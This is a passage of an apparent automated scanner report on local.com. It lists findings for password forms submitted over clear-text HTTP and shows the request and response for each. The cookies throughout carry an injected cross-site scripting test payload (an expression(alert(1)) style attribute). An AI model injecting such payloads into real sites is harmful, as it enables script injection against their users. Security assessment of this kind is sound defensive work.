Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Sterling+Bank|Dallas%2c+TX|Retail+Banks|15020100|16856575~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Sterling Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.18. http://www.local.com/business/results/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/results/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /business/results/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 132916
Date: Thu, 03 Feb 2011 16:40:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:39:59 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fbusiness%2fresults%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 132916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.19. http://www.local.com/contact.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /contact.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /contact.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 27733
Date: Thu, 03 Feb 2011 16:53:38 GMT
Content-Length: 27733
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title></title>

<
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.20. http://www.local.com/coupons/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /coupons/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /coupons/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 103071
Date: Thu, 03 Feb 2011 16:44:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&coupons.kw=; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 103071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Coupons in Dallas, TX | Local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.21. http://www.local.com/coupons/printable/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /coupons/printable/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /coupons/printable/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 25463
Date: Thu, 03 Feb 2011 16:45:55 GMT
Content-Length: 25463
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:45:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Not Found - Local.com</title>
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.22. http://www.local.com/dialogs/register.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dialogs/register.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /dialogs/register.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 27119
Date: Thu, 03 Feb 2011 16:55:56 GMT
Content-Length: 27119
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:55:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>www.local.com-Register</title
...[SNIP]...
<!-- END typeAhead items -->


<form name="aspnetForm" method="post" action="/dialogs/register.aspx" id="aspnetForm">
<div>
...[SNIP]...
</label>
                       <input name="defaultPageTemplate$password" type="password" id="defaultPageTemplate_password" class="createActInput" />
                   </div>
...[SNIP]...
</label>
                       <input name="defaultPageTemplate$password2" type="password" id="defaultPageTemplate_password2" class="createActInput" />
                   </div>
...[SNIP]...
</label>
                       <input name="defaultPageTemplate$haveActPassword" type="password" id="defaultPageTemplate_haveActPassword" class="haveActInput" />
                       <p class="pTB10">
...[SNIP]...

7.23. http://www.local.com/events/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /events/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 86267
Date: Thu, 03 Feb 2011 16:43:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:43:58 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 86267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Local Events | Find co
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.24. http://www.local.com/events/category/music/dallas-tx.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/music/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /events/category/music/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 92872
Date: Thu, 03 Feb 2011 16:44:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:31 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 92872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Concerts Events | Find
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.25. http://www.local.com/events/category/performing-arts/dallas-tx.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/performing-arts/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /events/category/performing-arts/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 87986
Date: Thu, 03 Feb 2011 16:44:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:36 GMT; path=/
